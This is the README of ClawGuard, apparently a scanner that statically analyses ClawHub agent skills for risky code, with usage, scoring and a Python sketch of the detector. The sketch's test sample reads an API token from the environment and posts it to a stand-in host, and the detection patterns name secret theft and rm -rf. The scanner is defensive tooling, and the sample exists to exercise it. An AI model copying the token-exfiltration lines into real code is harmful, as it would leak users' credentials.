ClawGuard 🛡️
Scan ClawHub skills for security risks before installing.
ClawGuard performs static code analysis on ClawHub skills to detect:
- 🌐 Network exfiltration (HTTP POST to external URLs)
- 🔑 Credential access (API keys, tokens, passwords)
- ⚡ Shell command execution
- 💥 File destruction (rm -rf, unlink)
- 🎭 Code obfuscation (eval, base64 decode)
- 👻 Hidden files and directories
Usage
Scan by skill name
Download and scan a skill from ClawHub:
```bash
uv run {baseDir}/scripts/scan.py --skill <skill-name>
```
Scan local directory
Scan a skill directory on your local filesystem:
```bash
uv run {baseDir}/scripts/scan.py --path /path/to/skill
```
JSON output
Get results in JSON format:
```bash
uv run {baseDir}/scripts/scan.py --skill <skill-name> --json
```
Examples
Scan the GitHub skill:
```bash
uv run {baseDir}/scripts/scan.py --skill github
```
Scan a local skill:
```bash
uv run {baseDir}/scripts/scan.py --path ~/.openclaw/skills/my-skill
```
Risk Levels
- 🟢 SAFE (0-30): No significant risks detected
- 🟡 CAUTION (31-60): Review flagged items before installing
- 🔴 DANGEROUS (61-100): High-risk patterns detected — DO NOT INSTALL
Exit Codes
- 0: Safe
- INLINECODE1: Caution
- INLINECODE2: Dangerous
Requirements
- Python 3.11+
- uv (Python package manager)
- clawhub CLI (optional, for downloading skills)
How It Works
1. Pattern Matching: Regex-based detection of dangerous code patterns
2. AST Analysis: Python AST parsing for eval/exec detection
3. URL Extraction: Identifies all network endpoints
4. Risk Scoring: Weighted severity scoring (0-100)
What It Detects
| Category | Weight | Examples |
|---|---|---|
| Network exfiltration | 25 | POST to unknown URL with data |
| Credential access | 20 | Reading API keys, tokens |
| Shell execution | 15 | exec(), subprocess, system() |
| File destruction | 15 | rm -rf, unlink, rmdir |
| Obfuscation | 15 | eval(), atob(), Buffer.from |
| Hidden files | 10 | Dotfiles, hidden directories |
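A minimal sketch of the pipeline described under How It Works, using the weights in the table above and the bands under Risk Levels. It is an added example, not ClawGuard's own code: the regexes, the `scan_source` helper, the sample inputs, and the rule that the score is the sum of the weights of the categories hit are all assumptions.

```python
import ast
import os
import re

# Weights from the "What It Detects" table (they sum to 100).
WEIGHTS = {"network": 25, "credentials": 20, "shell": 15,
           "destruction": 15, "obfuscation": 15, "hidden": 10}

# Assumed, illustrative regexes; not ClawGuard's real rule set.
PATTERNS = {
    "network": re.compile(r"requests\.post\(|urlopen\("),
    "credentials": re.compile(r"API_KEY|SECRET|TOKEN|PASSWORD", re.I),
    "shell": re.compile(r"\bsubprocess\.|\bos\.system\("),
    "destruction": re.compile(r"rm\s+-rf|\bos\.(unlink|rmdir)\(|rmtree\("),
}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")

# Constructed samples, not taken from any real skill.
BENIGN = 'def greet(name):\n    return f"hello {name}"\n'
SUSPICIOUS = '''
import os, requests
token = os.environ["API_TOKEN"]
requests.post("https://collector.example/upload", data={"t": token})
os.system("ls")
exec(payload)
'''


def scan_source(source: str, filename: str = "skill.py") -> dict:
    """Scan one Python file: categories hit, URLs, score and risk level."""
    hits = {cat for cat, rx in PATTERNS.items() if rx.search(source)}
    if os.path.basename(filename).startswith("."):
        hits.add("hidden")
    try:
        # AST pass: flags real eval()/exec() calls, ignoring comments and strings.
        for node in ast.walk(ast.parse(source)):
            if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                    and node.func.id in {"eval", "exec"}):
                hits.add("obfuscation")
    except SyntaxError:
        pass  # unparsable file: the regex findings still count
    score = sum(WEIGHTS[c] for c in hits)  # assumed: one weight per category hit
    level = "SAFE" if score <= 30 else "CAUTION" if score <= 60 else "DANGEROUS"
    return {"hits": sorted(hits), "urls": URL_RE.findall(source),
            "score": score, "level": level}


if __name__ == "__main__":
    for name, src in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, scan_source(src))
```

The extracted URL list is what the "check network endpoints for unknown domains" review step would work from; a comment that merely mentions `eval(x)` does not raise the score because the AST pass only sees real call nodes.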
Limitations
- Static analysis only: Cannot detect runtime behavior
- Regex-based: May have false positives/negatives
- JS/TS: Basic pattern matching (no full AST parsing)
- Encrypted/minified code: Cannot analyze obfuscated payloads
Best Practices
1. Always scan before installing untrusted skills
2. Review CAUTION-level findings manually
3. Check network endpoints for unknown domains
4. Never install DANGEROUS skills without verification
5. Report suspicious skills to ClawHub moderators
License
MIT